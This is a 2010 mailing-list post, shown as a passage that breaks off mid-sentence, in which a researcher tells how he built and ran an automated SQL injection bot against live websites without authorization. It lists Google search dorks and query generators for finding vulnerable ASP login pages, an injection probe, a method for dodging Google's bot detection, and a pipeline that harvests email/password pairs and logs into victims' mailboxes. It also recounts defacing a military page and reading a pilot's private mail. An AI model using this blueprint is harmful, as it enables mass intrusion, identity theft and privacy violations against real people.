[<prev] [next>] [day] [month] [year] [list]
Message-ID: <C26D0F02681C4545BB16A1819DA7DB3A@silence>
Date: Mon, 29 Mar 2010 20:28:06 +0200
From: "porkythepig" <porkythepig@...t.pl>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Raising Robot Criminals
"Raising Robot Criminals"
1. Intro.
/////////
Hi there.
I would like to share few thoughts concerning my recent research of the
automated Sql Injection "seek and penetrate" attack vector, focused on
identity theft and robot-driven attack propagation.
This "report" is a compilation of some analysis done for the runtime code
results and some random thoughts and ideas written down, during different
parts of the whole 2 year case study (all thanks to the advanced MS's
technology called "Notepad")
While there have been dozens white papers on the subject of web application
security as well as on Sql Injection, this text is not yet another one.
Instead, it's a short tale about an automated tool's developement time,
inspired somehow by the subsequently intriguing output data it produced,
data that actually made the code grow and mutate into different shapes.
The main objective was to build up the code and find out how far a fully
automated seek-and-penetrate web-app probing code may go without any human
supervision.
Moreover: to find what are the possibilities of future mutations for the
attack vector implementations.
I think everyone easily brings up in their mind one of recently most famous
comparisons in computer security research: an intruder who trespasses
somebody's possession to tell the owner that his door locks are not good
enough.
Well, this project from the very beginning was not an attempt to discuss
this famous comparison's pros and cons.
Instead I decided to find out what are the ACTUAL NUMBERS between the
execution of that particular attack vector in the wild.
The particular attack vector mutation that has been chosen to implement (but
definitely not the only one there to implement) was a combination of few
software and human factor vulnerabilities:
- sensitive data extraction through SQL Injection in web applications driven
by Microsoft SQL Server and exploiting ASP server side scripts
vulnerabilities,
- personal secret unsecure handling (by owner),
- personal secret unsecure storage (by the trustee),
- weak (or lack of) web search engines anti-robot detection/protection
targeting malicious robot crawlers.
You should also understand, that from obvious reasons certain details
concerning compromised organizations, companies and government institutions,
have been removed or reduced to minimum in this publication.
Also, giving the type of the project and the nature of the "output data", I
have decided NOT TO publish any source code (at least at this moment).
But first a bunch of probably well known facts.
Eleven years ago, Dec 25th 1998 the first official SQL Injection paper was
published in the Phrack magazine, in an article called "NT Web Technology
Vulnerabilities".
Since then the attack vector became one of the favourite instruments used by
the cyber criminals in internet conducted data and indetity theft.
The second fact: today's cyberized organizations and companies that web
users trust - that hold their personal data and sensitive unencrypted
secrets: "passwords", bound to home addresses, phone numbers and social
security numbers - are opened for remote penetration.
The last fact is that ever since the SQL command injection attacks began to
sweep the internet's infrastucture, security researchers and grey hats
there, trying to point out and prove the existence of a security hole which
could open wide the particular company's database for possible user indetity
theft, had but three options:
1. To warn the system's owner and await prosecution for computer hacking.
2. Keep their mouth shut, waiting until a cracker does his job silently,
penetrating the system and trading stolen identity data to a 3rd party
and/or turning the company's system into a trojan infection spreading unit.
3. Do nothing and watch how some script-kiddie eventually blows the database
up, resulting often in a rapid and insufficient system patching, sometimes
even without knowing the heart of the issue.
Again: since a detailed public discussion about the actual's organization
cyber security (and their proprietary web applications including app links,
penetration entrypoints, etc.) may generate much havoc - efforts were made
to limit to minimum any details that could uncover direct penetration
entrypoints (ie: links, interfaces) for the vulnerable corporations or
government organizations systems mentioned in this text.
The reason behind that form of security advisory is quite simple - since no
source code will be published for now and additionaly there shoudn't be and
won't be any vulnerable app links listed in the text as "script-kiddie
verifiable" examples - there are actually really few options left on how to
tell something about the actual research results.
Therefore, instead of a formal advisory - here it is - a short story about a
code and the research time itself rather than its results.
Since I'm a programmer - no writer at all - please forgive me my poor
english, style and most of all, my dyslexia :)
2. The Impulse.
///////////////
As a team of researchers noted, a vulnerability dies when the number of
systems it can exploit shrinks to insignificance.
Basing on that definition one could say that after the recent 10+ years of
rich research intensive exploitation SQL Injection attack vector is alive as
hell.
The whole thing with the research and the bot writing began during some
early spring sunday (as usual, somewhere between 1st and 2nd coffee) while I
tried to poke around to find some clues about a cryptography related problem
on SecurityFocus.
By a complete accident I've spotted a question message from a totally
different topic, from a user who was eagered to get some info about strange
looking log entries that he found on his Apache server.
He was intrigued by and entry containing part of code-like looking payload
and tried to get the answer if that logged event might have been some kind
of attack attempt. What dragged my attention was the answer, which
acknowledged his suspicions and identified the attack type as the Sql
Injection remote code execution...
Now, I must say here, that since i was kind of "raised" on the oldschool
assembler and rather low-level code tweaking (C64 forever:) over a hi-lev
languages interoperability - I still dont know how but I have, strangely,
kept certain distance as a programmer to any topic concerning SQL and
relational databases before.
Actually I practicaly avoided SQL related activities, either professionaly
or in private projects. The obvious result was my certain ignorance to the
topic, refleced in attraction to a low-lev security issues like memory
corruption and machine code reverse engineering. Finally, I trivialized the
severity of attack vectors aimed against databases in any possible occasion.
Now, you see I was a little bit confused following the SF's user post.
After reading one or two Sql Injection white papers and numerous shouty
articles describing this kind of attack vector multiple commercial system
penetrations, I've had that biggest question on my mind: isn't the DB
command injection threat something like 10 years well researched now and
should be a little bit, well uhhhmmmm .... dead ?
why would anyone seriuosly attempt this kind of attack this days if the
possible positive targets count would be close to zero, after that ammount
of time that passed since it's been first researched and through all theese
years of intensive exploitation?
And what's the deal with the remote code execution SQLi theese days?
Not a long time later, I've realized that being an ignorant has also its
good sides :)
Ironicaly it seems that empirical ignorance may sometimes become
one-helluva-impulse to a private research.
3. Sleepless.
/////////////
So I've had this huge question on my mind - all I needed was to check if I'm
wrong and the malicious code injection mentioned in the SF user's post was
just one on a milion - some last try of a 10 years old, dying rogue code,
hopelessly knocking on today's secure database world :)
After going through about five "how to crack an Sql DB in less than a
minute" 4yr+ old tutorials I've had all I needed: the algorithm of how to
find a potential victim and how to probe it for penetration ability.
Just as in the SF's user case, I've decided to pick PHP and MySql based DB
for start. And so I've began first "victim" hunt.
Asking google for a subsequent branch-types of companies I've been looking
for my first "accessible" remote DB table record somewhere out there.
And here it is! I've got it!
A sex wax shop...
Whatever.
A hack is a hack.
Just modyfying manualy application's Http/GET params and here we go: we've
got on our screen one by one all the accessible shop's customers details.
And about an hour ago I thought SQLi is a 10 year old dead attack vector :)
If few minutes of manual googling produces an arbitrary DB read access I
guessed it's worth a try to check if there was something more "interesting"
than an online sex wax shop.
After another day or two of sleepless Http/GET params fuzzing and a bunch of
accessed private corp client DBs varying from a fashion agencies to hotel
booking systems I've decided to make friends with the different injection
attack vector approach: ASP.
My collegue's first observation was - "Hey, MSSQL has a really nice user
friendly cracking interface". Nicely formatted error message syntax,
followed by elegantly served contents of programmer (or cracker) selected
table's record, and even precise hex error code number! Well, after all ASP
server side scripting technology is a Microsoft's baby so as usual you get
two in a pack of one.
The deal was actually quite simple: to locate a potential ASP SQLi attack
victim you needed to locate a vulnerable web application endpoint. To do
this you use URL target-filename pattern matching utilizing any web search
engine. The apps-endpoint had of course to interact somehow with
application's server side database, so that we could inject our query and
execute it. And which user's web application interface suits this goal
better than the password based authentication interface :)
So here I was. The nightmare started.
Nothing more but a common script kiddie, sleeping sth like 3hrs a day I
began to change into some kind of monstrous f***d up machine, typing
repeatidely, like a magic spell, one and the same sentence into browser,
again and again, asking google for subseqent matches against different
patterns describing possible system entrypoints.
4. Word play.
/////////////
Any programmer's job is first to imagine how the "thing" you want to bring
to life is going to work and then comes the fun part - making the names -
for your classes, methods, objects. In your code, everyting has to be named
somehow and you're a god here to make it named. In security researcher's
case however it's quite the opposite - you need to try to stand at the
particular system's programmer place, imagining how could it have been
coded - when you do so, you may be able to pick the places, by a file name
pattern for example, where you would most probably make a mistake and left a
security hole.
And of course the names... they are always the fun part.
After a day or two of brainless typing you finally begin to notice some
patterns describing the word combinations you type and the results you get.
So, the names were coming and going, one by one, right into the gogole's
search engine:
inurl:"Login.asp"
inurl:"CustomerLogon.asp"
inurl:"ClientLogon.asp"
inurl:"UserLogin.asp"+".gov"
inurl:"EmployeeLogin.asp"+".com"+"intranet"
...
System after system, inputting same apostrophe contating random sequence
into all the found FORM html fields, submiting and watching for any sign of
response page containing the familiar MSSQL's error code: 0x80040E14.
Funny that my finger-based "random generator" used for ASP "input fuzzing"
soon lost much of its randomness - after sth like a thousand manually typed
FORM input sequences they finally turned into: 'asd (one could say, it
became more like script-kiddie fingerprint :)
Obviously I did not focused so early on any specific SQLi mutation - giving
a Blind SQL Injection for one - nevertheless the goal remained the same (ie:
to check which one of the two is true: either the SQL Injection attack
vector could in fact become a successful weapon in a potential malicious
hands or that it's rather some old misty fraze nicely described in Wikipedia
and few years long dead).
So few next days seemed pretty same: brainless typing, matching for errors,
looking for subsequent targets, imagining any possible attack propagation
paths.
Somewhere at the begining of the third day I've found an entry into a
database of the bank... a SPERM bank to be precise.
"A bank is a bank. And I've just cracked a bank."
I guess I was repeating that to myself at least for next two days.
Anyway. When you notice you have began to act like a machine, repeating one
keyboard driven activity over and over - it is THE time. Finally, the time
to write some code has come. The code that will eventually relieve you from
your pitiful human-only drink/eat/rest limitations and make your vengence
possible upon the evil entity that turned you into machine for the past
week... :)
The first idea was to code few simple search query generators based on a
static word permutation lists and hook them up using HTTP client into a
google. The case was all about shooting new words, grouping them into
semantic sections and build simple lingual generators that would feed on the
groupped word sections.
For example, the following two groups of words (taken directly from my
code's config file), are to be mixed together creating different
permutations to build a final web search query:
Group0 = Logon
Group0 = Logon1
Group0 = Signon
Group0 = Signin
Group0 = Log_in
and
Group1 = Client
Group1 = User
Group1 = Master
Group1 = Admin
Group1 = Member
Group1 = Employee
Group1 = Customer
Group1 = Supplier
Using for example this query generator (actually it's the Bot's query
generator#1):
q1 = "inurl:" G0 || ".asp"
q2 = "inurl:" G0 || G1 || ".asp"
q3 = "inurl:" G1 || G0 || ".asp"
q4 = "inurl:" G1 || "/" || G0 || ".asp"
q5 = "inurl:" G1 || G0 || "/" || "default.asp"
We receive something like this:
inurl:"Logon.asp"
inurl:"ClientLogon.asp"
inurl:"LogonClient.asp"
inurl:"Client/Logon.asp"
inurl:"ClientLogon/default.asp"
inurl:"UserLogon.asp"
inurl:"LogonUser.asp"
... and so on.
The whole problem with the search engines is that they provide only a very
small, limited part of the actual query results, that their web crawler
robots were able to harvest from the very start. Asking the search engine
with those queries, we will receive maximum a 1000 hits (for google), while
the number of matching results, following that query pattern is sometimes
several thousand times bigger. Therefore we add for example a second and
third level distinguish-groups, first describing the target company's branch
and second distinquising between domain suffixes.
Group2 =
Group2 = voip
Group2 = remote
Group2 = banking
Group2 = airlines
Group2 = telecom
Group2 = software
Group2 = hosting
...
and
Group3 =
Group3 = com
Group3 = org
Group3 = net
Group3 = biz
Group3 = mil
Group3 = gov
Group3 = edu
...
Concatenating every query definition (in this example q1 to q4) with the
sequence: nq = "+" || G2 || "+" || G3, as a result we get:
inurl:"ClientLogon.asp"
inurl:"ClientLogon.asp"+"com"
inurl:"ClientLogon.asp"+"voip"
inurl:"ClientLogon.asp"+"voip"+"com"
inurl:"ClientLogon.asp"+"voip"+"org"
inurl:"ClientLogon.asp"+"voip"+"net"
...
The algorithm for query generators is actually quite simple, starting with
the most basic combinations, like:
inurl:"logon.asp"
inurl:"login.asp"
inurl:"login1.asp"
inurl:"signon.asp"
(combinations of words from just a single group) we expand the query with
different word groups each new level, using specific, programmer defined
concatenation.
At start we submit every generated query, store the results, and check the
result counter for them. If it is larger than the search engine's result
limit (lets say: 1000) we increase the generator level (to 2) and using the
defined concatenation method for that level we generate subsequent queries
with words from the next word group (ie: G1). If the predicted results count
for some or all of the produced query strings is again bigger than the
search engine's limit -> we go for the 3rd level generator concatention, and
so on...
The same scheme applies to password reminder services query generator:
Group9 = 1password
Group9 = 1pwd
Group9 = 1pass
Group9 = 1passwd
Group9 = 1pw
Group9 = 0login
Group9 = 0userid
...
and
Group10 = 1forgot
Group10 = 1forget
Group10 = 1forgotten
Group10 = 1lost
Group10 = 0find
Group10 = 0search
Group10 = 0email
Group10 = 1recovery
Group10 = 1recover
Group10 = 1retrieve
Group10 = 0get
Group10 = 1change
Group10 = 0new
Group10 = 1reset
Group10 = 1remind
...
Query Generator #2:
q1 = G9 || '.asp'
q2 = G10 || '.asp'
q3 = G9 || G10 || '.asp'
q4 = G10 || G9 || '.asp'
q5 = G9 || G10 || '/' || 'default.asp'
5. One toy story.
/////////////////
Programmatic automation of human behaviour and watching the code as it
interferes with random human beings is probably one of the coolest things in
bot programming.
Since that actually wasn't first bot coding attempt, I've decided to base
the code in major on one of my previous bot projects: an automated logic
decisioning code - browser MMO auto-playing bot.
The previous code was a kind of "vendetta" over Ogame - an MMO browser game
addiction that brutally took :) almost 3 months of my life (anyway a
differnet kind of story).
Three years after it was "brought to life" I've decided to use its "guts",
ie. HTTP client, HTML parser (bound together to provide a simple browser bot
engine) and basic AI Api (which actually had to be rebuilt almost from
scratch in this case) to create a different type of a robot code.
6. Robot vs. Anti-Robot.
////////////////////////
The first problem the new bot stumbled across was Google's anti-robot
protection. Aside of all the rest of code that keeps Google engine alive and
kicing this code was built by them for two things:
1. To prevent the Google servers from being DDoS-killed by remote query
robot repeaters, the ones that for example are being used within automated
WWW-stats software.
2. To recognize, signal and act against certain query patterns, being
possibly malicious, like for example automated web site infection software,
operating round the clock in search of new victims to embed the malicious
scripts within (or to steal the data from).
The first version of code executed without any delays between the queries or
any other kind of logic built in, to deal with the Google's anti-robot code
(I simply didn't have a clue it existed at first place :) and ended up very
quick with service-blocking entire NAT address space of my ISP and
successfuly disabling it to use google for ab. 3h.
The second launch locked the subnet for about half a day :)
So the very next thing done was building in a simple static 30s sleep()
between every page query HTTP request and disabling result-page jumping,
sticking up to just one-page-by-time incremental step. Constant delays of
course doesn't imitate human too perfectly, however the trick worked. At
least for some time...
About two weeks of bot's runtime later I've noticed that only first 100
results out of a thousand queries were dumped by the bot. Analysing the
issue it came out that after 10th result page, Google displayed its old good
"it seems like you're malicious robot trying to take control over the world"
info and denied going further with selected query.
So... Did they implemented a different robot recognition algorithm within
past two weeks, or what?
No. I don't think so.
Changing the delay to a bigger randomized value (90+RND(20)) did the job.
For the next month the first segment of the Bot (ie: the web search engine
hooked up target-seeker) executed without any recognition.
Fooling the Google's engine about being an actual human worked. After a
month turning the value of query page change delay back to static 90s
resulted instantineously with anti-robot service denial HTML warning, after
requesting 10th page. So the conclusion was - to trespass the
robot-protection the bot's thread should spend just enough CPU idle cycles
between every page increment to imitate a human behaviour.
The further analysis shown that the google search engine acts differently
for the queries containing certain URL file name specifiers like ".asp" or
".php". The search queries that has been recognized to ask for theese file
suffixes had simply a longer minimal page change delay to successfuly escape
of being recognized as a "malicious robot". It also has been noticed that
the google bot-lock of entire NAT area differs from 3 to ab. 32h.
Additionaly, the subsequent malicious-looking queries while in robot-lock
state hasn't been updating the lock countdown timer.
Google antibot code identifies remote human/non-human entity by IP not by
search sesssion cookie, resulting in that, a single search from any machine
within a local subnet behind the NAT that SUBSEQUENTLY uses the same search
query pattern (like for example 'inurl:"forgotten.asp"'), will lead to IDing
the subnet's public IP as a hostile by Google's code.
Anyway, long story short: to fool the Google's anti-bot protection we need
proper delays and human-like action randomization.
Building a protection against the query auto-generating process employed by
the robot software is not as difficult and obviously there could be
implemented more precise detection of the automated SQLi query syntax, by
the web search engine providers. Afterall, I guess it shoudn't be as easy as
googling your homework to search for the R/W accessible sex wax shop
customer database and get all clients info on the screen or to search for
the vulnerable US Department of Justice system like you would have been
googling for a dinner recipe.
However, it should also be considered that where a detection schema for
malicious action exists - there usually are always numerous ways to override
it. Fine detection algorithm shouldn't be taken as a "total cure" for the
attacks using "robot-googling" as victim search vector.
Ironicaly, while the bot got better and better dealing with google's
anti-robot recognition I was recognized few times by the very same system as
a machine (yepp), while typing search queries manualy, using just an old
school set of ten fingers :)
7. Bot's Development.
/////////////////////
There were two major code architecture changes through the whole
developement time so three different, subsequentialy more complex versions
of the bot has been developed, until it shaped into the final (or at least:
current) automated system.
Since the code has been based mostly on previous bot's (MMO bot) code,
written in C++, there wasn't actually much choice to be made about the
programming language. Although one must point that the C++ isn't the best
choice if we want to code a web crawling automated bot - looking backward
from the whole coding time perspective if I had the choice today and had to
write it from the scratch - I would have chosen Python blindfolded (at least
for this kind of robot).
The very first version of bot was a simple automated google query repeater,
using static "target patterns" (ie: ASP file name patterns to search, formed
in a static input list). The static list of about 150 query-word
combinations produced several thousand potential targets, which then were
probed by the pen-test algorithm: retrieve HTML contents -> parse and search
for FORM's -> feed every text-input field with error injection seq (ie:
'having 1=1) -> parse response for MsSQL error message pattern -> if
matched: enumerate all vulnerable SQL query columns -> log target probing
result (positive/negative).
The SECOND code's version was armed with more logic for google's
antirobot-protection "fooling" and introduced "run levels" into the probing
section. The code segment performing actual penetration of positive-matched
targets was given three run levels: vulnerability matching / database
structure enumertaion (tables/columns/column types) / automated record
harvest for every recognized (using name pattern matching) email/password
column name combos. All the harvested EM/PW pairs were stored in the
internal Bot's database.
The third (current) version went multiprocess. The code was divided into 3
sections (called later 'segments') interoperating together through the
internal DB and syncing through a named mutex. Two new major "toys" were
also introduced:
1. "Pattern Generators" (three for now) providing Segment-1 (penetration
target seeker) with possible victim's system URL patterns to use with google
connected query repeater,
2. "Data Objective Patterns" configured from config file, providing quickly
configurable regular expression based descriptions of what data the Bot
should look for, within the penetrable remote database (ie: email/pwd
combos, SSN/ID data, secret question/answer combos, credit card numbers).
The final (current) verions's architecture and execution flow:
The system consists of 3 independent code sections - called simply
'segments' - that perform interruptably their specific objectives in the
forever-loop. The segments are linked between just by a logic chain of the
input/output data - what is an result(output) data of one segment is the
input for the other. For example Segment-2 will not go operational until it
receives enough input data which is automaticaly-produced output of
Segment-1.
Segment-1 is an automated web search engine crawler driven by the 3 (so far)
basic word-fraze generators, used to produce subsequent web search queries.
For now the segment is coded to operate on two web search engines:
google.com and search.com. It consists of 3 query pattern generators that
produce subsequently permutations of selected query pattern, utilizing a
specificaly preconfigured for the project 400 word dictionary, divided to 9
functional groups. Every generated query is then used to perform an
automated search using each search engine connected and the results are
stored as Segment-1's output. After last query pattern generator has
produced its last permutation - Segment-1 stops.
Segment-2 objective is to process every potential target address (HTTP/HTTPS
link) that Segment-1's produced. It probes each system ONLY FOR ONE PRECISE
type of SQL Injection vulnerabibity: attack against buggy ASP server side
codes interconnected with MSSQL database systems. After positive match it
builds a penetration entrypoint, enumerates all accessible databases through
the entrypoint and scans all database's table structures for matches within
preconfigured Data Objective Patterns. Finally it "decides" using the DOP
matching which data will be a target for final penetration and performs an
automated data harvest for every DOP matched through all the databases
accessible entrypoints. Then is stores the data, pre-analyses it and goes
for the next target supplied by the S-1.
Segment-3 is driven by the Segment-2's output data, pre-analyzed after every
successful penetration. Every data entry that matches EMLPW Data Objective
Pattern (email/password: every table that has been recognized to hold
email/password combos records) becomes its input. This segment has 2
operational modes. First one is a POP3 proto / HTTP(s) Webmail server
discovery tool. At first it tries to match an email server protocol and
location for every matched email/pw combos from Seg-2. After that using a
recognized mail protocol, it performs a password matching for its
corresponding email address. If the pair: EmailAddress/Password matches - it
opens a mailbox using recognized protocol, enumerates all the messages and
dumps every message containing one or more of the words: "account", "login",
"password", "confidential" or "classified". After processing last output
entry from the Segment-2 this segment stops.
8. A school for a robot.
////////////////////////
Before any bot can leave its "master" and go by itself into the dangerous
human world it obviously needs a proper education and training :)
Just as its predecessor - the MMO bot for Ogame - training against different
human opponents on different game's "universums" (servers), trying to grow,
evolve and develop its best suited economic strategy algorithm - also the
SQLi penetration bot has to take its education somewhere. Unfortunately
there is one big difference between a game bot and a search-and-probe bot
like this: as Ogame's client-server game protocol (HTTP based) could be
reversed and described as a static sequence of URLs (links) to use by the AI
"puppet master", the penetration bot need to deal every time with a
different system - so it takes a lot more "training" for the second type of
bot to have the highest probability for that the code will recognize a
vulnerability if it exists and match the target as "negative" if doesn't,
for EVERY pen-tested system.
Keeping false-negatives count as low as possible is a key factor in this
kind of bot. Ironicaly it seems that the opposite situation may also occur
(which I'll try describe later) - the human trained robot could find a
vulnerability in a way that the human didn't even know about, actually, to
be able to train him :)
The first bot's penetration automation has been developed by training it
against vulnerable web database system (found earlier manualy), belonging to
an international, security training company (right, the irony is sometimes
unbearable...) providing private investigation / inteligence solutions. The
developement was just as long as the bot was able to perform successfuly,
ie. exited retrieving all the targeted data (personal information,
login/email/password data records), with no human supervision. First version
of the Bot performed ab. 100 subsequent penetrations of that system, until
it was able to do so, while I was trying to patch the bot's logic flaws and
to make the injection queries syntax used more simple and effective.
Although every time the code harvested the very same data (later
configurable as Data Objective Patterns in bot's second version) -
subsequently aiming data within tables holding logins, emails and passwords
of employees - the process must have been repeated as no code ever runs
bug-free after just first compilation. (BTW: if any of your 'release' code
could ever do so - according to the probability laws - you really should be
worried :)
These subsequent coding/recompilation/execution steps in order to force the
code to gain exactly same results as a human before, makes the code grow and
learn in order to become a robot. But it is up to human (programmer) to
decide who to await at the end of the "teaching line" - a malicious "robot
criminal" or a vulnerability assesement and response framework.
There is also one big question on morality, left unanswered.
Why the hell to use an unaware life target for an excercise, becoming a
criminal with every single enter you press, while you could build your own
local vulnerable application server or even download a virtualized one,
witin few minutes, preconfigured and pentest-ready?
The question is good.
The answer is tough (if any).
At the begin of the research I was a total SQL newbie (as a programmer). One
of my first goals was to change it - combining the pleasant with the useful.
And it's quite obvious that without a proper theoretical preparation, a
tutorial-only based crack-and-destroy learning approach doesn't make a
researcher of any kind - it makes a script kiddie. Finding differences
within several different life vulnerable systems and matching them against
each other to find all common factors that render them vulnearable is far
more effective way to learn the automated vulnerability detection system
(and me), than study approach based on a single, often naive example, which
is usually already too old to make a realistic model.
While I was learning SQL language syntax - the bot was "learning" SQL
Injection attack vector. For that, I guess every security researcher is a
sinner somewhere there, wandering on his "split guilt" mindfields, leaving
the final "enter key-press" decision to a human robot-code operator.
9. Randomized target penetration.
/////////////////////////////////
The penetration target - particular company or organization system is not
human selected here.
The code, employing randomized target pattern matching algorithm "selects"
it for you.
Obviously, saying: "I didn't commited a crime probing the system for the
vuln, the code did it" - is somewhat childish, isn't it?
In the hands of a criminal any kind of pen-testing tool will always be
programmed and used for malicious activities, regardless of its automation
or manual oriented operation architecture.
Everything depends from the programmers intentions - if they were malicious,
the code's behavior should also be expected to be malicious. In practice,
the code that automates some more complex problem solving process is in fact
a kind of snapshot on the strategic planning algorithm of programmers mind,
either it is automated MMORPG tactics-decisioning bot code or a security
vulnerability seek & penetration system.
Therefore, it would be nice to see some day, that the automated tools
seeking for vulnerable information systems over specific country, industry
branch or worldwide are in turn operational and running under control of
people whoose job is to protect us from either cyber criminals or enemy
cyberwarfare, (like for example every country's national CSIRT/CERT units).
At this moment it is not possible for whitehat "samaritans" out there to
perform a remote system penetration testing without previous formal
autorization from the systems owners - no matter how good their intentions
would be and how detailed the pentest report prepared - they are considered
as criminals with the very first enter key pressed.
As long as the particular public web app / web portal vulnerability exists,
it makes a serious threat to any internet user who unaware of digital system
compromise risks, trusted the system creators letting them process his
private ID data along with the most sensitive of all: secrets and passwords,
often universal ones. Once compromised, the system leads an attacker
exploiting universal passwords to compromise of the person's digital
security itself.
10. Primary Impact analysis.
////////////////////////////
After the bot's final version has been launched, it performed interruptably
(not including few blackouts during ligthning storms on my village) for
about a month. It probed from the Segment-1 produced list of 200K+ web
system addresses exactly 28944 systems for possible penetration entrypoints.
It matched "positive" against ASP/MSSQL Injection attack, exactly 2601
database servers, and tested them for possible penetration depth,
enumerating any fully accessible (read/write) database system using the
particular entrypoint DB User's access level.
Through a testing runtime month exactly 6557 databases from the particular
2601 DB servers has been matched by the Bot as fully accessible, using the
ASP based attack vector type.
The already known and widely recognized impact of the common SQL Injection
attack falls into few categories:
a) sensitive information disclosure,
b) loss of data integrity,
c) database server remote code execution and further network penetration.
Putting aside for a moment the impact analysis case, I'd like to mention an
accurate observation by a colleague of mine. One of my programmer friends,
not related to a security industry however, once he saw an MSSQL server
compromise in progress called it "an API for database cracking". It was,
after all, a very right comparison.
The default SQL server error reporting configuration, being physicaly one of
the motors of the ASP based command injection "popularity", equips an
attacker with easily text-parser traceable 32bit error code, strict syntax
and a single block error message containing apostroph enclosed particular
data record requested by an attacker - a heaven for parser writers - the
extracted data is prepared and served by server's error reporting engine
like a dinner in a good restaurant. The only thing the attacker should do in
order to watch the selected column's value on his web browser window is to
enforce an ASP server side application to cause an SQL data type mismatch
run-time error (a numeric/character type mismatch error, to be precise).
But lets get back to the impact.
As one security response team stated rightfully in one of its reports - one
of the reasons behind a spree of malicious code embedded within web pages,
may be infection of web page's administrator computer systems with spyware,
crafted specificaly to steal the FTP/SSH protocol passwords stored locally
by client software like TotalCommander or Putty. Despite the fact that
system administrators belong to the security threat highly-aware group, the
possibiblity of the compromise of the webmasters/administrators machine by
malware infection definitely exists.
But this is just one possibility.
On the other hand, a constantly increasing activity, observed in Sql
Injection driven attacks, and observations made during the research could
suggest at least few different infection scenarios.
While analysing Bot's gathered data - some systems that had been found
opened for the penetration by the code's pentest "reconasaince" section
(segment-2) had been also matched (after post-runtime "manual" analysis) to
be previously compromised by a different human attacker (or an attack code).
Certain database records, reflecting the webpage's contents, contained an
embedded "second stage" attack code in JavaScript, prepared to either
redirect the user who launched this particular web site's section or to load
and execute additional JS code from a different HTPP remote server. The
servers addresses in most cases were terminated with chinese domain suffix.
That gives us the first alternative.
The second one is a compromise of a web hosting company.
Serving a proper example right away: the bot gained access to a database of
Polish email/www hosting company, containing all the account login/password
records needed by attacker to take control of any website hosted by the
company, providing the attacker with correct FTP credentials (this case was
also mentioned in other sections of the text). The same schema applies also
to penetrable web application developement company databases.
However, the most frequently noticed (analysing Bot's results), opened way
for attacker to infect a website with a rogue redirection/exploit code, was
to exploit the SQL Injection vulnerability within a minor, less critical or
long time dead but not yet removed webpage, stored however together on a
single SQL server administrated by a more critical assets holding
institution. Exploiting the fact that the vulnerable server side code (lets
say an ASP in our example) while accessing SQL server data can use database
user account shared with many other databases stored on that single server,
an attacker executes automated enumeration of all the R/W accessible
accounts (using for example db_name() MSSql function). After that all he
need is to select any database enumerated earlier, suiting as a DB backend
for the particular WWW site - this time more critical and not vulnerable to
any direct attack - and to alter its contents, leaving the critical "secure"
webpage either defaced or trojan infecting.
An absolute record-holder of this type, giving the number of single SQL
server R/W accessible databases was a job portal developement company. A
minor, old, but still working job website belonging to the company was
tracked down by S1 and verified by S2 as vulnerable to a database command
execution attack using "Register Account" interface as SQL command injection
entrypoint. After enumeration of R/W accessible databases, Bot's S2 counted
800+ databases accessible using same DB user as used by the vulnerable ASP
script, including retired military officer job portal and law enforcement
job portals.
The most critical system however, given the possible impact of webpage
defacement/malware infection attack, was the case of database server
belonging to the US Defence Logistics Agency (DLA). Five, out of twenty of
all server-stored databases were found write accessible, using same DB user
account shared with the vulnerable ASP code: a very old (dating last century
actually) and hardly operational but still online - same agancy's system,
developed and "maintained" (not that they didn't try) according to a welcome
banner, by the U.S. Space and Naval Warfare Systems Center (SPAWAR). It's
not to hard to imagine the possible impact factor of a defacement/trojan
infection code installment within an official military owned web system,
that utilizes the attacker controlled databases contents to render every
single piece of data and script embeded within their mainpage's HTML body.
Since I've never been a big fan of shouty, messy defacements - all that was
done in that case, to validate if the modification of the particular
selected DLA page's contents (www.desc.dla.mil) was in fact possible using a
vulnerability located in a completely different subdomain - was changing a
single small 'a' letter in the fronpage's welcome text to a capital one.
Actually, if the "mispelling" hasn't been noticed yet, it's quite possible
it is still there ...
One obvious conclusion is that the resulting, final impact of the SQL
Injection attack conducted through a vulnerable website's entrypoint, which
reflects the inter-connected database contents, can be also (for one) the
website driven malware infection, targetting client host machines. The
affected website (hosting a hostile script for redirection / malware
installment now) may be any web application whose contents is rendered using
the database system shared with the vulnerable entrypoint, through the same
ODBC user credentials.
11. I forget, therfore I am.
////////////////////////////
So, you say you use top-notch only well secured systems, where common
security holes are a far history, yet, your digital account still got hacked
somehow...
Well, there's at least one thing we might be missing.
Even when you use trusted company systems like e-banking accounts,
government or military provided systems, which, lets assume for a moment,
are free from the most common security flaws :) , your password is long and
random, you keep it private and didn't even whisper it ever - there is still
a single thing that makes any of these different system accounts vulnerable:
your short memory.
The first primitive bot's version, messy coded, with statically compiled-in
search queries (describing just few possible victim patterns), after a day
or two has probed and matched a DB command injection flaw within one of web
applications belonging to an aviation-holding corporation operating in the
USA (the holding owns actually six different airlines).
The actual impulse that turned me to continue this project and to build the
multilevel attack code (rather than just drop the case after getting
acknowledged that the internet is just an SQL Injection swamp) was the
finding, made while "studying" this particular system. After getting the
admin's credentials using the particular SQLi vuln and logging into personel
data administration panel - a single Excel document file was downloaded,
containing updated detailed information of 1361 company workers. Besides
their addresses, phones and SSN numbers, every personal record had filled in
a proper email address, login name and an unprotected plaintext password
belonging to the particular worker of the aviation support company's branch.
Now, I'm sure it may be obvious to you right now, but it wasn't so obvious
to me at the time - while sitting there in the hard chair looking at my
laptop's display reading the ID records - after about half an hour lecture
(I know... I can't help I'm a slow thinker) I've realized I'm not looking on
a computer generated dictionary based passwords, given randomly by the web
application upon the registration - but on the actual VOLUNTARILY PROVIDED
users sensitive keywords, stored without any kind of encryption, keywords
with which every particularly asked person wanted to protect its account.
That, along with the fact that 2 columns on the left from the password field
in the document lay also voluntarily entered contact email address, began to
form that biggest question that haven't stopped driving my mind crazy ever
since: how many of those poor unaware people entered their email address
aside with the very password OPENING IT right into the vulnerable, browser
accessible database system...
That was actually the first time I stood before an option of unauthorized
email access. But since I was already, kinda "fallen researcher" whose
crawling-code was performing sth like 1000 unauthorized penetration tests of
different systems a day - my conscience didn't actually stand a chance...
Copy-pasting first randomly chosen email/password into the mail portal login
page and ... I've had an authenticated yahoo mail account session in front
of me.
Ten minutes later I knew the owner was a commercial aircraft pilot working
for a US based airlines, holding pilot license for ERJ-170 / ERJ-190
aircrafts. I had his license number along with the FAA issued pilot license
scans in high resolution (saved on his mailbox in 'sent' box), his SSN
number along with his 401K detailed form sent to an employer and credentials
to access his current funds state and finally an FAA's issued medical
certificate scan informing that he should wear corrective lenses.
But hey! That was just the first email/pwd combo from the list I've used -
it was obvious that it must have been just a fluke. And since getting into
some random email accounts and snooping through people's life was not a kind
